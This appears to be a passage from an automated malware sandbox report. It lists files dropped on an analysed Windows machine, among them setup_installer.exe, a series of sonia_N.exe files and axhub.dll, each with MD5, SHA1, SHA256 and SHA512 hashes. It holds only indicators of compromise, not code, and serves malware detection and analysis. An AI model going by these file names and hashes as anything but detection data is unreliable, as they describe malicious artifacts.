                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e0a3f58abe9815d7fcc34c8693c46b26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a28ab7d6d44235755ae11c026f6f7b7110ed4d50

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a4db14e27a204854318d07a831feb8f9cbd66892e500b2bb4a2ad74724aae7b5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a2914d9bf3851a383294d8cfa0acf3a9a7a39dd388eda5b6eaa2bf42d06b43dbc2650b2825b05d3ba32853e938983b3f72788cb53e0a4912ad834624ef6390ec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e94392de97fcdf2e1d17d99934cf3f3c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  787cefd943197f4fd939de978e7e0594a77d27e2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  91df0609f4e582e510cb33ed2ce218d24cc7a495c2d6bc96e99cee6e256fc974

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5874917733d42057c2f062d51828464372efc525cc4cc6a183badf8ffe9e0546daada441b8916c012bf988852a4dad69d3971f9684a999ddd78a64d4088610f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\libcurlpp.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\libstdc++-6.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_3.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_4.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_5.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_6.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4f98447407d0d3058ce74271ceaffb47

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d652e0e80502833e09e838417f957a2b7a867687

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7a115c554799cb345fac03160a05a6407b7c1e5f28f440ec3c03a9b8454145a3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  655af6f836746040685a3e77c5d2e2bc1c488469921ddfd376fdee9079bf0b36a0f511755a243e52912eac1e8221bf436d9a5d9976d882cb0aa278f4658a2c23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4f98447407d0d3058ce74271ceaffb47

